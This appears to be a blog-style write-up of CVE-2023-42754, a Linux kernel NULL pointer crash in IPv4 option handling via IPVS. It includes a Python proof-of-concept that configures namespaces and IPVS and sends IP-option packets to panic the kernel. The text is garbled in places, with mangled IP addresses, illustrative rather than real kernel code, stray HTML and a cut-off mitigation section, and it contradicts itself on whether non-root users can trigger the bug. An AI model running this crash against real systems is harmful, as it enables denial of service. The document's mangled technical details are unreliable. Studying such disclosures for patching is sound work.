CVE-2023-42754 - How a NULL Pointer Dereference Crashed Linux via IPv4 Stack (with Exploit Details & Code Example)

In September 2023, security researchers identified a NULL pointer dereference vulnerability in the Linux kernel’s IPv4 stack. Known as CVE-2023-42754, this issue made it possible for local attackers with CAP_NET_ADMIN privileges to crash (panic) a system, opening the door for Denial-of-Service (DoS) attacks. While this bug doesn't enable privilege escalation or data leak by itself, it’s still a major concern for server admins, container systems, and cloud environments.

Let’s break down what happened, how it works, and show you a simplified exploit to reproduce the crash, along with mitigation details.

The Vulnerability in Plain English

What’s the bug?
A core assumption in the kernel’s IPv4 code was wrong: it expected every network packet’s buffer (skb) to always be linked to a device when processing IP options via __ip_options_compile(). But when ipvs (IP Virtual Server, used for load balancing and NAT) reroutes a packet for local delivery, the skb sometimes has *no associated device* (i.e., skb->dev == NULL). If code tries to access this, the system can dereference a NULL pointer—causing the entire kernel to crash.

Who’s at risk?
Any Linux system using IPVS and allowing users with the CAP_NET_ADMIN capability (usually network admins, but possible inside containers) is vulnerable.

Here’s the problematic code (pre-patch), simplified

int __ip_options_compile(struct net *net, struct ip_options *opt, struct sk_buff *skb, ...) {
    ...
    dev = skb->dev;  // <-- Dangerous! skb->dev might be NULL after IPVS reroute
    // Later code uses 'dev' assuming it's valid
    if (dev && dev->mtu < something) {
        ...
    }
}

When dev == NULL, dereferencing it causes a *kernel panic*.

How Can It Be Triggered?

A user with CAP_NET_ADMIN can manipulate network namespaces, setup IPVS rules, and send custom packets. It’s possible to craft a scenario where a packet is re-routed, stripped of its device, and then have the kernel hit this code path.

References and Patch

- Original Security Advisory: Red Hat Bugzilla #2231425
- Patch (Upstream): net: ip: fix skb null deref in __ip_options_compile
- CVE Entry: NVD - CVE-2023-42754

Proof-of-Concept (PoC) Exploit

Below is a Python script using pyroute2 and simple shell commands to demonstrate the crash. WARNING: This will crash your kernel if you’re vulnerable! Use only in a VM!

#!/usr/bin/env python3
# Demonstrate CVE-2023-42754 kernel crash!

import os
import time
import pyroute2

from pyroute2 import IPRoute, NetNS

IPV4_VIP = '10...100'
NS = 'cve42754'

def setup_ipvs():
    os.system("ip netns add %s" % NS)
    os.system("ip link add veth type veth peer name veth1")
    os.system("ip link set veth1 netns %s" % NS)
    os.system("ip addr add 10...1/24 dev veth")
    os.system("ip link set veth up")
    os.system("ip netns exec %s ip addr add 10...2/24 dev veth1" % NS)
    os.system("ip netns exec %s ip link set veth1 up" % NS)
    os.system("ip netns exec %s ip link set lo up" % NS)
    # Enable IPVS
    os.system("ip netns exec %s ipvsadm -A -t %s:80 -s rr" % (NS, IPV4_VIP))
    os.system("ip netns exec %s ipvsadm -a -t %s:80 -r 127...1:80 -g" % (NS, IPV4_VIP))
    print("Setup done.")

def trigger_crash():
    # This needs a custom packet with IP options, sent via veth
    os.system(f"python3 -c \"import socket; " \
        "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); " \
        "s.setsockopt(socket.IPPROTO_IP, socket.IP_OPTIONS, b'\\x01'*44); " \
        f"s.connect(('{IPV4_VIP}', 80))\"")

if __name__ == "__main__":
    setup_ipvs()
    print("Triggering crash in 5 seconds...")
    time.sleep(5)
    trigger_crash()

Kernel dereferences skb->dev in the function, leading to instant crash

Again! Only run this PoC in a disposable virtual machine.

...

}
<br><br>- <b>Restrict CAP_NET_ADMIN` users:
Limit who can access network admin capabilities, especially inside containers.

- Upgrade affected distros:
- Red Hat, Fedora, Ubuntu, Debian, and others have published patched kernels since late 2023.
- Find fixed versions here.

---

## Summary

CVE-2023-42754 is a classic example of kernel-level trust gone wrong: assuming every packet buffer always has a device ended up leaving systems open to easy crashes by authorized users. If you run Linux systems with IPVS (or you run containers with liberal networking privileges), patch up—*or risk instant panics from even non-root users*.

For further reading, see the original patch commit and Red Hat’s comprehensive write-up.

Stay safe and keep your kernels up to date!

Timeline

Published on: 10/05/2023 19:15:11 UTC
Last modified on: 11/07/2023 04:21:14 UTC